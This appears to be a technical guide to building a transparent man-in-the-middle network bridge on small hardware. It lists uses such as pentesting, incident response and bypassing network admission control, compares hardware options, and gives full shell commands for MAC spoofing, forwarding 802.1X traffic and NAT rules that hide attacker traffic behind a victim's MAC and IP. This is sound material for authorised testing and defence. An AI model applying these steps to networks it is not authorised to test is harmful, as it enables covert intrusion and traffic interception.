Incident Response | Capturing traffic between an infected computer and a command and control computer |
Network Inspection / Injection | Allows traffic to be captured and injected |
Penetration Testing | Stealthy way of accessing the network and also a way of providing assurance by connecting the pentest laptop to the MIBR inject port and capturing all traffic on the MIBR. Any discussion about what did or did not take place can be easily verified. It also has the advantage of not requiring any additional switch ports to be configured as you use an existing one |
NAC Bypass | Many enterprises implement NAC (Network Admission Control) which prevents unauthorised devices from being connected. Using the MIBR the victim computer provides the authentication which is forwarded to the switch port |
Type | NICs | Pros | Cons | Memory (MB) | Price (Approx) | OS |
---|---|---|---|---|---|---|
Laptop + USB Network Adapter | 2 | Relatively cheap and easy | Size, throughput limited by USB | 2048-32768 GB | 40 Eur | Any |
Soekris 4801 | 3 | Small Form Factor, possible wireless extension | Throughput limited by CPU, low memory | 256 | 120 Eur | voyage |
Soekris 6501 | 4 | Small Form Factor, possible wireless extension | Throughput limited by USB speeds | 512-2048 | 180 Eur | Any |
PCengines APU2 | 3 | Small Form Factor, built-in GSM, possible wireless extension |   | 4096 | 182 Eur | Any |
Raspberry PI 3-B + USB Network Adapter | 1 | Small Form Factor, Cheap | Speed limited by USB | 1024 | 45 Eur | Any |
Raspberry PI Zero + 2x USB Network Adapter and USB Hub | 1 | Small Form Factor, Cheap | Speed limited by USB,Messy with all the connectors, prefer 3-B | 512 | 5 Eur | Any |
eth0 | Connected to Switch |
eth1 | Connected to Victim device |
eth2 | Connect your laptop here (use IP 192.168.0.2/24) |
brctl | Bridge tools |
iptables | provides IP firewalling |
ebtables | provides L2 (bridge) firewalling |
bridge.sh | Shows all options |
bridge.sh start | Configure all interfaces and set bridge mode |
bridge.sh stop | Stop the bridge |
bridge.sh restart | Perform a stop/start |
bridge.sh status | Show the status of the bridge |
bridge.sh setspoof | Add an inject interface and configure IP and NAT using CIFS info from victim captured on TCP/445 |
bridge.sh setspoofdhcp | Add an inject interface and configure IP and NAT using DHCP info from victim (disconnect victim link to force) |
ifconfig eth0 0.0.0.0 # Remove any IP address ifconfig eth0 down # Take interface down ifconfig eth0 hw ether de:ad:be:ef:d4:ad # Force MAC addresss ifconfig eth1 0.0.0.0 ifconfig eth1 down ifconfig eth1 hw ether de:ad:be:ef:d4:ae ifconfig eth2 0.0.0.0 ifconfig eth2 down ifconfig eth2 hw ether de:ad:be:ef:d4:af ifconfig eth2 192.168.0.1 netmask 255.255.255.0 brctl delbr mibr # Delete any existing bridge brctl addbr mibr # Create a new bridge interface brctl addif mibr eth0 # Add eth0 (connected to victim computer) brctl addif mibr eth1 # Add eth1 (connected to switch) brctl stp off # Turn off Spanning Tree # The value used here depends on the Kernel version, 8 works on most but patched versions support 49144 # Set bridge to pass all L2 traffic (such as 802.1x) this makes it non 802.1D compliant echo 8 > /sys/class/net/br0/bridge/group_fwd_mask echo 49144 > /sys/class/net/br0/bridge/group_fwd_mask # Ignore IPv6 Router advertisements echo 0 > /proc/sys/net/ipv6/conf/br0/accept_ra #arptables -A OUTPUT -o eth1 -j DROP # Make sure that ARP traffic is dropped from the attacker ifconfig mibr up # Bring up bridge interface (takes about 30-60 secs for the interface to settle)
With this configuration the bridge is now transparently configured to pass L2 (and above) traffic between the switch and the victim.
The next step is to configure the bridge to allow traffic injection by setting up L2 translation (ebtables) and NAT (iptables) for the attacker traffic
The pre-requisite for this is to determine the Victims IP & MAC address and find an unused IP address on the victim network; this can easily be found by using tcpdump/tshark on the victim interface (eth0). The logic for this is encapsulated in the setspoof and setspoofdhcp commands supported by the bridge.sh
SWINT=eth1 # Switch side Interface SWMAC=de:ad:be:ef:4d:ae # Switch side MAC address COMPMAC=xx:xx:xx:xx:xx:xx # Victim MAC address COMIP=yyy.yyy.yyy.yyy # Victim IP address BRINT=mibr # Bridge Interface BRIP4=yyy.yyy.yyy.yyy-2 # An usused IP address on the victim network RANGE4=60000-61000 # Range of ports to use # L2 NAT ebtables -t nat -A POSTROUTING -s ${SWMAC} -o ${SWINT} -j snat --to-src ${COMPMAC} # IPv4 NAT iptables -t nat -A POSTROUTING -s ${BRIP4} -o ${BRINT} -p tcp -j SNAT --to ${COMIP}:${RANGE4} # IPv6 NAT (remove if no IPv6) BRIP6= # An usused IPv6 address on the victim network RANGE6=58000-59999 # Range of ports to use ip6tables -t nat -A POSTROUTING -s ${BRIP6} -o ${BRINT} -j SNAT --to-source [$COMIP6]:${RANGE6}